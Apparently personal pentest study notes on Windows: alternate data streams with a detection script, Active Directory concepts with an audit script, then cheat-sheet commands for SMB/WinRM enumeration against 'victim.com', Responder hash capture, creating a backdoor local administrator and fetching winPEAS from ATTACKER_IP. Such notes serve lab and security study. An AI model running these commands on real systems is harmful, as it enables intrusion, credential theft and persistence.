Windows notes
Alternate Data Streams (ADS)
Alternate Data Streams are a feature of the Windows NTFS (New Technology File System) file system. Every file has at least one data stream, the unnamed $DATA stream, and NTFS lets a file carry additional named streams alongside it. Windows Explorer does not display these streams, and the file size it reports covers only the main stream. Third-party tools such as Sysinternals Streams can list them, cmd.exe shows them with dir /r, and PowerShell can read and write them natively through the -Stream parameter of Get-Item, Get-Content and Set-Content.
From a security perspective, malware authors have used ADS to hide data, and even executables, behind innocent-looking files.
Not all uses are malicious. When you download a file from the Internet, the browser writes a Zone.Identifier stream (the "Mark of the Web") to it; this is how Windows knows to warn you before the file is opened or run.
To learn more about ADS, refer to the MalwareBytes article linked here.
Bonus: If you wish to interact hands-on with ADS, I suggest exploring Day 21 of Advent of Cyber 2.
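As an added example (not part of the original notes) of working with ADS from PowerShell: the script creates a file with a hidden named stream, lists its streams, writes and reads a Zone.Identifier stream like the one browsers attach to downloads, and then hunts a directory for files carrying streams other than the standard ones. The directory, file and stream names are made up for the demo.

```powershell
# Added example: inspecting and hunting NTFS alternate data streams.
# Assumes a writable %TEMP%; all names below are made up for the demo.
$dir  = Join-Path $env:TEMP 'ads-demo'
New-Item -ItemType Directory -Path $dir -Force | Out-Null
$file = Join-Path $dir 'report.txt'

# Every file has the unnamed stream ':$DATA'; this is what Explorer shows.
Set-Content -Path $file -Value 'visible content'

# Add a named stream. Explorer and a plain "dir" will not show it, and the
# Length reported for report.txt does not change.
Set-Content -Path $file -Stream 'hidden' -Value 'payload hidden in ADS'

# Enumerate every stream of the file: expect ':$DATA' and 'hidden'.
Get-Item -Path $file -Stream * | Select-Object FileName, Stream, Length

# Read one stream by name.
Get-Content -Path $file -Stream 'hidden'

# Simulate the Mark-of-the-Web a browser writes on download. ZoneId=3 is the
# Internet zone; this stream is what makes Windows warn before running the file.
Set-Content -Path $file -Stream 'Zone.Identifier' -Value "[ZoneTransfer]`r`nZoneId=3"
Get-Content -Path $file -Stream 'Zone.Identifier'

# Hunt: list every file under the directory that carries a stream other than
# ':$DATA' or 'Zone.Identifier'. Those are the candidates for hidden data.
Get-ChildItem -Path $dir -File -Recurse |
    ForEach-Object { Get-Item -Path $_.FullName -Stream * } |
    Where-Object { $_.Stream -notin ':$DATA', 'Zone.Identifier' } |
    Select-Object FileName, Stream, Length

# Clean-up. Unblock-File removes only Zone.Identifier; Remove-Item -Stream
# deletes an arbitrary named stream without touching the file's main data.
Unblock-File -Path $file
Remove-Item -Path $file -Stream 'hidden'
Get-Item -Path $file -Stream *    # only ':$DATA' should remain
```

Point the hunt at a directory such as a user's Downloads or a web root to find streams an attacker may have planted; a named stream holding an executable is a strong signal, since legitimate software rarely stores anything beyond Zone.Identifier there.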
Built-in tools (Run dialog / CMD)
Local User and Group Management: right-click the Start Menu, click Run and type lusrmgr.msc
System Configuration utility: msconfig
Computer Management: compmgmt.msc
System Information: msinfo32
Resource Monitor: resmon
Registry Editor: regedit
Tip: Windows Update can also be opened from the Run dialog or CMD with the command control /name Microsoft.WindowsUpdate
https://msrc.microsoft.com/update-guide (the Microsoft Security Response Center update guide: look up CVEs and the updates that fix them)
BitLocker Drive Encryption is a data protection feature that integrates with the operating system and addresses the threats of data theft or exposure from lost, stolen, or inappropriately decommissioned computers.
BitLocker provides the most protection when used with a Trusted Platform Module (TPM) version 1.2 or later. The TPM is a hardware component that manufacturers install in many newer computers. It works with BitLocker to protect user data and to verify that the computer has not been tampered with while the system was offline (the volume key is only released if the measured boot chain matches).
Volume Shadow Copy Service (VSS) coordinates the required actions to create a consistent shadow copy (also known as a snapshot or a point-in-time copy) of the data that is to be backed up.
Attackers use built-in Windows tools and utilities in an attempt to go undetected within the victim environment. This tactic is known as Living Off The Land. Refer to the following resource here to learn more about this.
Active Directory
The server that runs the Active Directory services is known as a Domain Controller (DC).
Active Directory Domain Services (AD DS) acts as a catalogue holding information about all of the "objects" on the network: users, groups, machines, printers, shares and many others.
Users
Users are one of the objects known as security principals, meaning that they can be authenticated by the domain and can be assigned privileges over resources like files or printers. You could say that a security principal is an object that can act upon resources in the network.
Users can represent two kinds of entities:
- People
- Services: you can also define users to be run by services such as IIS or MSSQL. Every service needs an account to run under, but service accounts differ from regular users in that they should hold only the privileges needed for their specific service.
Machines
Machines are another type of object within Active Directory; for every computer that joins the domain, a machine object is created. Machines are also "security principals" and are assigned an account just like any regular user. This account has fairly limited rights within the domain itself.
Processes running as SYSTEM on a computer authenticate to the domain as that computer's machine account, so the account effectively carries full control of its own machine. It is not meant to be used by anyone except the computer itself, but as with any other account, if you have the password you can log in with it.
Note: machine account passwords are rotated automatically (every 30 days by default) and consist of 120 random characters, so guessing or cracking them is not practical.
Identifying machine accounts is easy because they follow a fixed naming scheme: the computer's name followed by a dollar sign. For example, a machine named DC01 has a machine account called DC01$.
Security Groups
Security groups are also considered security principals and, therefore, can have privileges over resources on the network.
Groups can contain both users and machines as members and, if needed, other groups (nesting).
Several groups are created by default in a domain and can be used to grant specific privileges to users. Some of the most important default groups:
Domain Admins: members have administrative privileges over the entire domain. By default they can administer any computer in the domain, including the DCs.
Server Operators: members can administer Domain Controllers but cannot change membership of administrative groups.
Backup Operators: members can read any file regardless of its permissions (via the backup privilege); intended for performing backups of data on computers.
Account Operators: members can create or modify other accounts in the domain.
Domain Users: all user accounts in the domain.
Domain Computers: all computers in the domain.
Domain Controllers: all DCs in the domain.
You can obtain the complete list of default security groups from the Microsoft documentation.
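The following PowerShell, added here and not taken from the notes above, ties the Users, Machines and Security Groups sections together: it lists service accounts (users with a ServicePrincipalName), expands the privileged groups from the list above and flags machine accounts (names ending in $) among their members, and reports computer objects whose password has not rotated within the default 30 days. It assumes the RSAT ActiveDirectory module on a domain-joined host with an account that can read the directory; the group names are the built-in ones and the 30-day threshold is the default rotation interval.

```powershell
# Added example: audit of service accounts, privileged group membership and
# machine-account password age. Requires the ActiveDirectory module (RSAT).
Import-Module ActiveDirectory

# 1. Service accounts: user objects that carry a ServicePrincipalName are the
#    "users representing services" described above.
Write-Host '== Users with an SPN (service accounts) =='
Get-ADUser -Filter 'ServicePrincipalName -like "*"' -Properties ServicePrincipalName |
    Select-Object SamAccountName, @{n='SPNs'; e={ $_.ServicePrincipalName -join ', ' }}

# 2. Privileged groups from the list above. -Recursive expands nested groups,
#    so a user reaching Domain Admins through another group is still listed.
$privileged = 'Domain Admins', 'Server Operators', 'Backup Operators', 'Account Operators'

Write-Host '== Privileged group members =='
foreach ($group in $privileged) {
    $members = Get-ADGroupMember -Identity $group -Recursive -ErrorAction SilentlyContinue
    foreach ($m in $members) {
        # Machine accounts are security principals and can be placed in these
        # groups too; their SamAccountName ends in '$' (e.g. DC01$). Flag them,
        # since a workstation in Domain Admins is almost never intended.
        $kind = if ($m.objectClass -eq 'computer') { 'MACHINE' } else { $m.objectClass }
        '{0,-18} {1,-9} {2}' -f $group, $kind, $m.SamAccountName
    }
}

# 3. Machine account passwords rotate automatically (30-day default). A
#    computer object whose password has not changed for much longer is either
#    stale (decommissioned but never removed) or worth a closer look.
Write-Host '== Computers with a password older than 30 days =='
$stale = (Get-Date).AddDays(-30)
Get-ADComputer -Filter * -Properties PasswordLastSet |
    Where-Object { $_.PasswordLastSet -lt $stale } |
    Select-Object Name, SamAccountName, PasswordLastSet, Enabled |
    Sort-Object PasswordLastSet
```

Run it from a domain member as a low-privilege domain user; reading group membership and computer attributes needs no admin rights, which is exactly why an attacker's first step after landing in the domain looks the same.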
PowerShell commands
# Reset sophie's password, prompting for the new one so it never lands in the shell history
Set-ADAccountPassword sophie -Reset -NewPassword (Read-Host -AsSecureString -Prompt 'New Password') -Verbose
# Force sophie to change the password at next logon
Set-ADUser -ChangePasswordAtLogon $true -Identity sophie -Verbose
Enumeration
SMB (Samba / Windows shares)
# Enumerate shares with valid credentials
crackmapexec smb victim.com -u USERNAME -p 'password#1234' --shares
# Dump the domain password policy (check the lockout threshold before spraying)
crackmapexec smb victim.com -u USERNAME -p 'password#1234' --pass-pol
# Recursively list share contents and your permissions on them
smbmap -u 'USERNAME' -p 'password#1234' -H victim.com -r
# Interactive access to a single share
smbclient -U USERNAME //victim.com/Shared
# Check whether the credentials grant WinRM access (CME prints "Pwn3d!" on success)
crackmapexec winrm victim.com -u USERNAME -p 'password'
# Interactive PowerShell session over WinRM
evil-winrm -i windcorp.thm -u USERNAME -p 'password'
Networking
Responder
Responder is an LLMNR, NBT-NS and mDNS poisoner with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication servers supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication. When a host on the segment tries to resolve a name that DNS does not know, it falls back to these broadcast protocols; Responder answers, and the victim authenticates to it.
sudo responder -I tun0
--> capture the victims' NetNTLMv2 responses and crack them offline (hashcat mode 5600, John's netntlmv2 format). NetNTLMv2 is a challenge-response, not the NT hash, so it cannot be passed; it has to be cracked or relayed.
Post Exploitation
system
# All groups the current user belongs to and its privileges (look for SeImpersonatePrivilege, SeBackupPrivilege, etc.)
whoami /all
# Reset a local user's password
net user USERNAME PASSWORD
# Create a local user, then add it to the local Administrators group
net user USERNAME PASSWORD /add
net localgroup Administrators USERNAME /add
# List members of an AD group, expanding nested groups
Get-ADGroupMember -Identity 'Account Operators' -Recursive | select name
privilege escalation
# Pull winPEAS from a web server you host on ATTACKER_IP:8000 (the .bat build runs from cmd.exe without PowerShell)
Invoke-WebRequest -Uri 'http://ATTACKER_IP:8000/winPEAS.bat' -OutFile winpeas.bat
psexec: Sysinternals PsExec (or Impacket's psexec.py) runs commands on a remote host over SMB given local-admin credentials; used for lateral movement once a password or hash is recovered.